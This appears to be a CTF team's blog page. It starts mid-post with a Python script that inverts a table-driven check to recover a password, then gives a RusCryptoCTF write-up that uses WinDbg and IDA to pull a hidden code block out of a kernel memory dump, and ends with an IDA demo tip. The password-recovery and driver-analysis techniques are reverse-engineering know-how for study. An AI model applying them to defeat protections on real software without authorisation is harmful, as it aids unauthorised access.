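    """Model of brute_f: look up one symbol at a time, return the final value."""
    state = init
    for ch in s:
        off = (state * NCOLS + ALPHABET.index(ch)) * ENTRY
        state, = struct.unpack_from("<H", table, off)
    return state


def offset_to_cell(offset):
    """Byte offset -> (row, column); None when the match straddles two entries."""
    if offset % ENTRY:
        return None
    return divmod(offset // ENTRY, NCOLS)


def predecessors(value, table=TABLE):
    """Every (previous value, symbol) whose cell holds `value`, found by byte search."""
    needle = struct.pack("<H", value)
    pos = table.find(needle)
    while pos != -1:
        cell = offset_to_cell(pos)
        if cell is not None:          # skip hits that are not aligned on an entry
            yield cell[0], ALPHABET[cell[1]]
        pos = table.find(needle, pos + 1)


def candidates(target, length, table=TABLE):
    """Lazily yield (start value, string) for every backward path of `length` steps."""
    if length == 0:
        yield target, ""
        return
    for state, ch in predecessors(target, table):
        # `ch` is the last symbol; the recursion supplies everything before it
        for start, prefix in candidates(state, length - 1, table):
            yield start, prefix + ch


def recover(target, length=PASS_LEN, init=INIT_STATE, table=TABLE):
    """First string of `length` symbols that drives `init` to `target`, or None."""
    for start, s in candidates(target, length, table):
        if start == init:
            return s
    return None


if __name__ == "__main__":
    secret = "2h 2h2h 2h"            # constructed sample input
    target = forward(secret)
    found = recover(target)
    print("target %#x -> %r, forward check %#x" % (target, found, forward(found)))
```

Run stand-alone it picks a sample input, computes its final value and recovers a string that the forward model accepts. Against the real binary, build_table would be replaced by the bytes read from "dict" and the start-value filter in recover by the Appcall check shown above.<br />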
Thank you for your attention. Have fun at CTFs with IDAPython.</div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-79991729187649135052011-03-18T08:01:00.000-07:002011-04-13T03:49:11.718-07:00RusCryptoCTF T4 Task<div dir="ltr" style="text-align: left;" trbidi="on"><br />
Let's look at the UFOlogists solution to task T4 of RusCryptoCTF.<br />
<br />
<blockquote><span style="color: #38761d;"><span style="font-family: "Georgia","Times New Roman",serif;"><i>We were given an access to the box on which key container was running. It was uploaded not long ago by third party developer. Container search ended with BSOD with help of antirootkit and antivirus. Analyze the dump and find the key in root of OS.</i></span></span></blockquote><blockquote><span style="color: #38761d;"><span style="font-family: "Georgia","Times New Roman",serif;"><i>P.S.</i></span></span><span style="color: #38761d;"><span style="font-family: "Georgia","Times New Roman",serif;"><i>We know for sure that flag contains only latin symbols. download file</i></span></span></blockquote><br />
First of all, unzip it and get the memory dump. Load it into WinDbg.<br />
<br />
Let's start<br />
<span style="color: #444444;"><b><span style="font-family: "Georgia","Times New Roman",serif;"><span class="Apple-style-span" style="background-color: white;">kd> </span><span class="Apple-style-span" style="background-color: white;">!analyze -v</span></span></b></span><br />
<blockquote><span class="Apple-style-span" style="font-size: x-small;">WARNING: Stack unwind information not available. Following frames may be wrong.</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9c58 8a267f44 badb0d00 00000000 00000801 nt!Kei386EoiHelper+0x291c</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9ce4 81a2aa31 00000004 00000d54 00000000 klif+0xdf44</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9d54 81a2b2ff 00000000 00000000 8d41f348 nt!IoSetIoCompletion+0x3bd</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9d74 819f1a2d 8d41f348 00000000 00000001 nt!IoSetIoCompletion+0xc8b</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9dc0 8184aa3e 905f5973 83d2e8a0 00000000 nt!RtlDestroyAtomTable+0x50f</span><br />
<span class="Apple-style-span" style="font-size: x-small;">00000000 00000000 00000000 00000000 00000000 nt!RtlSubAuthorityCountSid+0x3c4</span></blockquote>The stack is not unwound cleanly (note the warning), and klif is not a kernel module we know. Let's Google the driver name klif.<br />
It's an antivirus driver (Kaspersky's klif.sys). Remember that the memory dump was made with an antivirus and an antirootkit running.<br />
OK. Let's list all loaded modules.<br />
<span class="fullpost"><br />
<span style="font-family: "Georgia","Times New Roman",serif;"><b><span style="color: #444444;">kd> lm oft</span></b></span><br />
(the last entries in the list)<br />
<blockquote><span style="font-size: x-small;">905de000 905e1d00 Dbgv \??\C:\Windows\system32\Drivers\Dbgv.sys Sat May 17 19:18:56 2008 (482EF760)</span><span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">905e2000 905f0000 atapi32 \??\C:\Windows\System32\drivers\atapi32.sys Wed Mar 09 23:33:41 2011 (4D77E425)</span><br />
<span style="font-size: x-small;">905f0000 905f8700 Normandy \SystemRoot\System32\Drivers\Normandy.SYS Fri Apr 30 08:00:34 2010 (4BDA55E2)</span><br />
<span style="font-size: x-small;">93c10000 93e11000 win32k \SystemRoot\System32\win32k.sys Sat Jan 19 08:36:46 2008 (47918C6E)</span><br />
<span style="font-size: x-small;">93e20000 93e37000 dxg \SystemRoot\System32\drivers\dxg.sys Sat Jan 19 08:36:11 2008 (47918C4B)</span><br />
<span style="font-size: x-small;">93e50000 93e59000 TSDDD \SystemRoot\System32\TSDDD.dll Sat Jan 19 09:01:09 2008 (47919225)</span><br />
<span style="font-size: x-small;">93ea0000 93ec8a80 vmx_fb \SystemRoot\System32\vmx_fb.dll Fri Oct 03 22:41:58 2008 (48E66776)</span></blockquote>One of them (atapi32.sys) was built in 2011 and one (Normandy.SYS) in 2010; all the other drivers are stock Vista ones.<br />
Googling Normandy.sys shows it belongs to RkU (RootkitUnhooker), the antirootkit.<br />
<br />
Let's analyze the driver, starting with its PE header.<br />
<span style="font-family: "Georgia","Times New Roman",serif;"><span style="color: #444444;"><b>kd> !dh 905e2000</b></span></span><br />
<blockquote><span class="Apple-style-span" style="font-size: x-small;">Debug Directories(1)</span><br />
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Type Size Address Pointer</span><br />
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cv 70 acb8 98b8<span class="Apple-tab-span" style="white-space: pre;"> </span>Format: RSDS, guid, 1, d:\develop\my_project\ruscryptotask\driver\ruscrypto\objfre_win7_x86\i386\Ruscrypto.pdb</span></blockquote>The PDB path confirms it is the RusCrypto task driver.<br />
Dump the image from memory (0xE000 bytes, the size lm reported):<br />
<span style="color: #444444;"><b><span style="font-family: "Georgia","Times New Roman",serif;">kd> .writemem d:\dumpnt.exe 0x905e2000 L?E000</span></b></span><br />
<br />
Load it into IDA with the image base set to 0x905e2000.<br />
<br />
Remember that the driver's INIT section is discarded after loading, so DriverEntry is not in the dump.<br />
Find pieces of code instead.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRstAkbE5wjxhGapCg2gvbzmfai6Q-q0_xaoBWbjLPg6kbf2eBlK-v33wK7bCN7J6QdM6OdMiikvrnDpNoUXteThBNbSIOsMQq_MXD_WRVsXlE-xdot1p5viyXjcTzolJS193sLk1i7DE/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRstAkbE5wjxhGapCg2gvbzmfai6Q-q0_xaoBWbjLPg6kbf2eBlK-v33wK7bCN7J6QdM6OdMiikvrnDpNoUXteThBNbSIOsMQq_MXD_WRVsXlE-xdot1p5viyXjcTzolJS193sLk1i7DE/s400/Capture.JPG" width="400" /></a></div><br />
IDA colors the code; press 'P' to create a function.<br />
Now the imported functions. IDA recognizes the .idata section, so all imports show up in red, but their names are unknown:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioSuR2zCI5AHR5GNXM0kMgqjDqXenS9Aqb6IB7eecwwTnqDgiUfgbiyZMCp6J7fdvJsrgVj-U31_Q70_RA6sEvBRi-eRMpFfIkQbSGD2sfZy_XjcIrqqqx2HwOupT4iJ1M2dKxVwjKajY/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioSuR2zCI5AHR5GNXM0kMgqjDqXenS9Aqb6IB7eecwwTnqDgiUfgbiyZMCp6J7fdvJsrgVj-U31_Q70_RA6sEvBRi-eRMpFfIkQbSGD2sfZy_XjcIrqqqx2HwOupT4iJ1M2dKxVwjKajY/s1600/Capture.JPG" /></a></div><br />
The import entries are:<br />
<span class="Apple-style-span" style="font-size: x-small;"> </span><br />
<blockquote><span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4000 extrn unk_905E4000 ; CODE XREF: sub_905E4422+712 p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4000 ; DATA XREF: sub_905E4422+712 r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4004 extrn unk_905E4004 ; CODE XREF: sub_905E4422+70B p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4004 ; DATA XREF: sub_905E4422+70B r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4008 extrn unk_905E4008 ; CODE XREF: sub_905E4422+6FC p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4008 ; DATA XREF: sub_905E4422+6FC r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E400C extrn unk_905E400C ; CODE XREF: sub_905E4422+22 p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E400C ; DATA XREF: sub_905E4422+22 r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4010</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4014 extrn unk_905E4014 ; CODE XREF: .rdata:905E4BAA p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4014 ; DATA XREF: .rdata:905E4BAA r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4018 extrn unk_905E4018 ; DATA XREF: sub_905E4BB6 r</span></blockquote>Resolve each of them with WinDbg:<br />
<br />
<b><span style="color: #444444;"><span style="font-family: "Georgia","Times New Roman",serif;">kd> u poi(905E4000) </span></span></b>(each .idata slot holds the address of the imported kernel function; <b>ln poi(905E4000)</b> gives just the nearest symbol) and rename the entries in IDA.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzeK_nu76PUgbxZp96JI1VdyZCISyLniLHRJkTJsCZOdvNNi7DnrQ3gSHqHOqoYxe1PS2J6cX2O0YHCMnJHjtc3bB7xjQXuuduyj75pKmFld9kykbxVdLBCRLikkobQ_xubY2lda-RUE/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzeK_nu76PUgbxZp96JI1VdyZCISyLniLHRJkTJsCZOdvNNi7DnrQ3gSHqHOqoYxe1PS2J6cX2O0YHCMnJHjtc3bB7xjQXuuduyj75pKmFld9kykbxVdLBCRLikkobQ_xubY2lda-RUE/s1600/Capture.JPG" /></a></div><br />
Now the import table looks like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_wDYgAyfbMUstvbHQVHpKOC8P2-91uAJMT2y-GR05e4JsRyOKvQYRGEs9E5Bcr1Qh-6mZPBCmmd9q-PMprluf-1U4X4-5_En_sSAEwFw4g1YV4MO6esx6V9LuJtbCoj8AWzEY6KYojQ/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_wDYgAyfbMUstvbHQVHpKOC8P2-91uAJMT2y-GR05e4JsRyOKvQYRGEs9E5Bcr1Qh-6mZPBCmmd9q-PMprluf-1U4X4-5_En_sSAEwFw4g1YV4MO6esx6V9LuJtbCoj8AWzEY6KYojQ/s400/Capture.JPG" width="400" /></a></div><br />
Much more readable. Two things stand out: the driver allocates a pool block and never frees it,<br />
and it calls MmProtectMdlSystemAddress.<br />
<br />
<pre class="libCScode" id="ctl00_contentContainer_ctl01_code" space="preserve" style="background-attachment: initial; background-clip: initial; background-color: #dddddd; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-top-color: rgb(200, 205, 222); border-top-style: solid; border-top-width: 1px; color: #000066; display: block; font-family: 'Courier New', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: hidden; overflow-y: hidden; padding-left: 5px; padding-right: 5px; padding-top: 5px; white-space: pre-wrap; word-wrap: break-word;"><span class="Apple-style-span" style="font-family: "Segoe UI","Verdana","Arial"; font-size: 11px;"><code>NTSTATUS MmProtectMdlSystemAddress(
__in PMDLX MemoryDescriptorList,
__in ULONG NewProtect </code></span><span class="Apple-style-span" style="color: #000066; font-family: monospace; font-size: 12px; white-space: pre-wrap;">);</span></pre>Apply a symbolic constant to the NewProtect argument (it resolves to PAGE_EXECUTE_READ). Now the piece of code reads:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGsD9jCxo50bs4oYS7sZLSq39ZGtIacfHochRBx2sylbbT545IkvaXf4zPynBp9TBqdGu0AgGhsLycYqlG6Q0_7pYe5uM-3Lfv1zEPEKdvdYKEIT1xWBCPWt1sY-T3LzYr6GDSUDrOihY/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGsD9jCxo50bs4oYS7sZLSq39ZGtIacfHochRBx2sylbbT545IkvaXf4zPynBp9TBqdGu0AgGhsLycYqlG6Q0_7pYe5uM-3Lfv1zEPEKdvdYKEIT1xWBCPWt1sY-T3LzYr6GDSUDrOihY/s1600/Capture.JPG" /></a></div><br />
The driver builds an MDL over the memory at [ebp-80h] + 0x236, protects it as executable and later calls into it.<br />
So the interesting memory is a pool block. How can we find it? Let's look at the other memory function:<br />
<br />
<pre class="libCScode" id="ctl00_contentContainer_ctl01_code" space="preserve" style="background-attachment: initial; background-clip: initial; background-color: #dddddd; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-top-color: rgb(200, 205, 222); border-top-style: solid; border-top-width: 1px; color: #000066; display: block; font-family: 'Courier New', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: hidden; overflow-y: hidden; padding-left: 5px; padding-right: 5px; padding-top: 5px; white-space: pre-wrap; word-wrap: break-word;"><code>PVOID ExAllocatePoolWithTag(
__in POOL_TYPE PoolType,
__in SIZE_T NumberOfBytes,
__in ULONG Tag
);</code></pre><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR4EWgOP8L_5_w4k2fa8IHp0g0Ld6y6bhX84vZ8B_WwVliqHCZLnjv1B9svn6tt-vUfCCrFwwC7KCs1t6_-oqH5wQHdPLod7uHXZubkphRF1c9RQSGUQvC_eWBG-EOPKF8Jx-BjpiEUmg/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR4EWgOP8L_5_w4k2fa8IHp0g0Ld6y6bhX84vZ8B_WwVliqHCZLnjv1B9svn6tt-vUfCCrFwwC7KCs1t6_-oqH5wQHdPLod7uHXZubkphRF1c9RQSGUQvC_eWBG-EOPKF8Jx-BjpiEUmg/s1600/Capture.JPG" /></a></div><br />
<br />
Now we are sure that the driver allocates this pool block and stores the pointer at [ebp-80h].<br />
We need to find the block in memory, but the pointer lived on the stack and is gone...<br />
The kernel has not lost it, though: every pool allocation carries its tag in the pool header, so we can find the block by TAG.<br />
<br />
The parameters of ExAllocatePoolWithTag are:<br />
<br />
<blockquote>PoolType [in]<br />
Specifies the type of pool memory to allocate. For a description of the available pool memory types, see <a href="http://msdn.microsoft.com/en-us/library/ff559707%28VS.85%29.aspx">POOL_TYPE.</a><br />
<br />
NumberOfBytes [in]<br />
Specifies the number of bytes to allocate.<br />
<br />
Tag [in]<br />
Specifies the pool tag for the allocated memory. Specify the pool tag as a character literal of up to four characters delimited by single quotation marks (for example, 'Tag1'). The string is usually specified in <b>reverse order</b> (for example, '1gaT'). The ASCII value of each character in the tag must be between 0 and 127. Each allocation code path should use a unique pool tag to help debuggers and verifiers identify the code path.</blockquote><br />
Note the reversed order: 0x4D646Ch spells 'Mdl' as a number, but in memory the bytes are 6C 64 4D 00, i.e. 'ldM' followed by a zero byte. WinDbg again:<br />
<span style="font-family: "Georgia","Times New Roman",serif;"><b><span style="color: #444444;">kd>!poolfind ldM</span></b></span><br />
<br />
Nothing; the string form is meant for four-character tags, and the fourth byte of this tag is 0 (!poolused prints it as 'ldM.'). Let's list all pool tags instead.<br />
<b><span style="font-family: "Georgia","Times New Roman",serif;"><span style="color: #444444;">kd>!poolused</span></span></b><br />
<br />
If you get an error, add <span class="Apple-style-span" style="color: blue; font-family: "tahoma","arial",sans-serif; font-size: 13px;">c:\symserver;SRV*c:\symserver*http://msdl.microsoft.com/download/symbols </span>to the symbol path.<br />
And ldM is there:<br />
<blockquote>ldM. 1 576 0 0<span class="Apple-tab-span" style="white-space: pre;"> </span>UNKNOWN pooltag ' ldM', please update pooltag.txt</blockquote>Size 576 is 0x240 in hex: the driver asked for 0x238 bytes and the 8-byte pool header makes up the rest.<br />
Another way to get the block is !poolfind with the numeric tag: <span style="font-family: "Georgia","Times New Roman",serif;"><span style="color: #444444;"><b>kd>!poolfind 0x004D646C</b></span></span><br />
This fails again, so restrict the search to the nonpaged pool (the second argument is the pool type, 0 = nonpaged):<br />
<b><span style="color: #444444;"><span style="font-family: "Georgia","Times New Roman",serif;">kd>!poolfind 0x004D646C 0</span></span></b><br />
<br />
<blockquote>8d4a9a60 size: 240 previous size: 30 (Allocated) ldM.</blockquote><br />
We have found the block. Dump it:<br />
<span style="color: #444444;"><b><span style="font-family: "Georgia","Times New Roman",serif;">kd> .writemem d:\dumpnt2.exe 0x8d4a9a60 L?240</span></b></span><br />
<br />
The first 8 bytes are the pool header; everything after that is code. Load it into IDA.<br />
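What !poolfind and the size arithmetic above rely on is the 8-byte _POOL_HEADER in front of every allocation. The following Python is an added example (not from the write-up and not real dump data): it parses the 32-bit Vista/7 pool header, walks adjacent blocks of a page checking that each block's PreviousSize links back to its neighbour, renders tags the way !poolused does (the zero byte of 'ldM' showing as '.'), locates the block by numeric tag and strips the header off to get the payload. The page fragment it scans is constructed so that a 0x240-byte block tagged 0x004D646C sits at 0x8d4a9a60, as in the output above; the field layout (PreviousSize:9/PoolIndex:7, BlockSize:9/PoolType:7, PoolTag, sizes in 8-byte units, PoolType 0 meaning free) is the public x86 _POOL_HEADER definition.<br />

```python
import struct

# _POOL_HEADER on 32-bit Vista/7 is 8 bytes; both sizes are in 8-byte units:
#   +0 PreviousSize:9 bits, PoolIndex:7 bits   +2 BlockSize:9 bits, PoolType:7 bits   +4 PoolTag
POOL_HDR = struct.Struct("<HHI")
UNIT = 8


def tag_bytes(tag_int):
    """The tag as it sits in memory (little-endian): 0x004D646C -> b'ldM\\x00'."""
    return struct.pack("<I", tag_int)


def tag_display(tag_int):
    """WinDbg-style rendering of a tag; non-printable bytes such as the 0 show as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in tag_bytes(tag_int))


def parse_pool_header(buf, off):
    w0, w1, tag = POOL_HDR.unpack_from(buf, off)
    return {
        "prev_size": (w0 & 0x1FF) * UNIT,
        "pool_index": w0 >> 9,
        "size": (w1 & 0x1FF) * UNIT,        # header + payload
        "pool_type": w1 >> 9,               # 0 = free, anything else = allocated
        "tag": tag,
    }


def encode_pool_header(prev_size, size, pool_type, tag_int, pool_index=0):
    """Inverse of parse_pool_header, used only to build the constructed dump below."""
    assert prev_size % UNIT == 0 and size % UNIT == 0 and size // UNIT < 0x200
    return POOL_HDR.pack((prev_size // UNIT) | (pool_index << 9),
                         (size // UNIT) | (pool_type << 9), tag_int)


def walk_pool_blocks(buf, base):
    """Walk consecutive blocks of one pool page, checking the back-link the way !pool does."""
    off, prev = 0, 0
    while off + POOL_HDR.size <= len(buf):
        hdr = parse_pool_header(buf, off)
        if hdr["size"] == 0:
            break                            # a zero BlockSize is corrupt: stop, don't loop
        hdr["va"] = base + off
        hdr["linked"] = hdr["prev_size"] == prev
        hdr["payload"] = buf[off + POOL_HDR.size:off + hdr["size"]]
        yield hdr
        prev, off = hdr["size"], off + hdr["size"]


def find_by_tag(buf, base, tag_int):
    """Equivalent of '!poolfind <tag>' over one page: every block carrying the tag."""
    return [h for h in walk_pool_blocks(buf, base) if h["tag"] == tag_int]


# Constructed page fragment (not real dump data): three adjacent blocks, the second one
# placed at 0x8d4a9a60 with the tag and sizes that !poolfind reported on the page.
BASE = 0x8D4A9A30
LDM_TAG = 0x004D646C                         # bytes 6C 64 4D 00 = "ldM\0"


def build_dump():
    irp = encode_pool_header(0, 0x30, 1, 0x20707249) + bytes(0x30 - 8)        # 'Irp '
    body = b"\x55\x8b\xec\x83\xec\x10" + bytes(0x238 - 6)                      # fake code
    ldm = encode_pool_header(0x30, 0x240, 1, LDM_TAG) + body
    free = encode_pool_header(0x240, 0x40, 0, 0x65657246) + bytes(0x40 - 8)   # 'Free'
    return irp + ldm + free


DUMP = build_dump()

if __name__ == "__main__":
    for h in walk_pool_blocks(DUMP, BASE):
        print("%08x size: %x previous size: %x (%s) %s" % (
            h["va"], h["size"], h["prev_size"],
            "Allocated" if h["pool_type"] else "Free", tag_display(h["tag"])))
    block = find_by_tag(DUMP, BASE, LDM_TAG)[0]
    print("payload: %d bytes, starts %s" % (len(block["payload"]), block["payload"][:3].hex()))
```

On a real dump the buffer would be the page read around the address !poolfind printed, and the payload of the matching block is exactly what .writemem + 8 delivers to IDA.<br />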
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdHTudfoJRC4pDdJd4n0VFE9BvdsZbgTUr06Xe0cb4fxCf49NyG-FYjhKt2I9wlIdqbdO7pQkF0n8pztF-xO2Zcl5tvl4BAUSQXQgEdgVnCcQoMNKiUcVwGYdObGTYDax02jwSef53t8/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdHTudfoJRC4pDdJd4n0VFE9BvdsZbgTUr06Xe0cb4fxCf49NyG-FYjhKt2I9wlIdqbdO7pQkF0n8pztF-xO2Zcl5tvl4BAUSQXQgEdgVnCcQoMNKiUcVwGYdObGTYDax02jwSef53t8/s1600/Capture.JPG" /></a></div><br />
A self-contained function with no imports and some data built on the stack. Execute it under IDA with the Bochs debugger.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrms4u2Ivc3Y9A27pNHbi5oNt3dPQmBI4XvbFIeTtdVE6A3TLUV5gRW1LYprQNSYS6JQC0YV3j7tcfw1tnv4r3h6IFGNA4UHLZO1WS0_cEstd6gsYAhI8KUw1cOBaLPcZTUhU9usPx_8k/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrms4u2Ivc3Y9A27pNHbi5oNt3dPQmBI4XvbFIeTtdVE6A3TLUV5gRW1LYprQNSYS6JQC0YV3j7tcfw1tnv4r3h6IFGNA4UHLZO1WS0_cEstd6gsYAhI8KUw1cOBaLPcZTUhU9usPx_8k/s1600/Capture.JPG" /></a></div><br />
Here is the answer.<br />
<br />
P.S. The encryption in the driver binary was DES; the encryption in the pool block was XTEA. </div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-21156358488121745442011-02-21T13:03:00.000-08:002011-04-13T03:50:23.868-07:00Saving db in IDA demo 6<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">As you know, the new free version of IDA can't save databases. For some purposes this version is enough, but sometimes we need to keep our work. So I will show how you can save an IDA database to SQLite.</span><br />
<div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="fullpost"><br />
<div dir="ltr" style="text-align: left;" trbidi="on"><ol style="text-align: left;"><li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Download and install <a href="http://www.hex-rays.com/idapro/idadowndemo.htm" style="background-color: white;"><span class="Apple-style-span" style="color: #674ea7;">IDA demo 6</span></a><span class="Apple-style-span" style="color: #351c75;">.</span></span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="color: #351c75;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Get a <a href="http://code.google.com/p/idapython/"><span class="Apple-style-span" style="color: #674ea7;">IDApython</span></a> with IDA 6 support.</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><a href="http://code.google.com/p/mynav/"><span class="Apple-style-span" style="color: #674ea7;">MyNav</span></a>. </span></li>
</ol></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">After installing all stuff and starting IDA you will see this window. </span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3salfnUarfDAZtshC5bLB8fTlcgCnxy4_mhyphenhyphenlywJl6Y5j5hlSIObXzSsrXa0aH20VNfhJOCF2H0A6sEI_aIrhhLS3vCqhtjdR2FjfaZAOqwaO3hofZZRmzvAjU5eSTOUK4ZgTjd26ZuU/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3salfnUarfDAZtshC5bLB8fTlcgCnxy4_mhyphenhyphenlywJl6Y5j5hlSIObXzSsrXa0aH20VNfhJOCF2H0A6sEI_aIrhhLS3vCqhtjdR2FjfaZAOqwaO3hofZZRmzvAjU5eSTOUK4ZgTjd26ZuU/s200/Capture.JPG" width="200" /></span></a></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The IDA demo doesn't export PLUGIN_ENTRY, so idaapi.add_menu_item(<i>"Edit/Plugins/"</i>, ...) doesn't work.</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Before starting the mynav.py script it is necessary to replace the strings in the <i><u>registerMenus</u></i> function from <i><span class="Apple-style-span" style="color: red;">"Edit/Plugins/"</span></i> to <i><span class="Apple-style-span" style="color: #38761d;">"Edit/Other/"</span></i>. All the MyNav items will then be available in the Other menu.</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now all you need is to choose <i>"Edit/Other/MyNav: Advanced utilities</i>" </span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKYJoswqfzMl0c-pNR_Dh-EDnAV0k5N9UMRZVR6EJSLU7xm8RKPwj9YIz5CngrbylnX10wYsOZkEhYMMBog0k-f1PSqsyZ3VGyyJXzwrd_Bzcj_Nt-o4Rfbj9fVweCB7uU34ftr2F-Q8/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKYJoswqfzMl0c-pNR_Dh-EDnAV0k5N9UMRZVR6EJSLU7xm8RKPwj9YIz5CngrbylnX10wYsOZkEhYMMBog0k-f1PSqsyZ3VGyyJXzwrd_Bzcj_Nt-o4Rfbj9fVweCB7uU34ftr2F-Q8/s320/Capture.JPG" width="320" /></span></a></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">and save the current session to the DB. An example of saving a database is available on the <span class="Apple-style-span" style="background-color: white;"><a href="http://joxeankoret.com/video/exportimport.htm"><span class="Apple-style-span" style="color: #351c75;">joxeankoret </span></a></span>web site.</span></div></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">P.S. A Russian version is available at <a href="http://ufoctf.ru/ufoblog/396/"><span class="Apple-style-span" style="color: #351c75;">UFOCTF</span></a>.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">P.P.S. Copy the GDB plugin from IDA 5.5 and it works in IDA 6. IdaStealth also works and shows up in the "Edit/Plugins/" menu.</span><br />
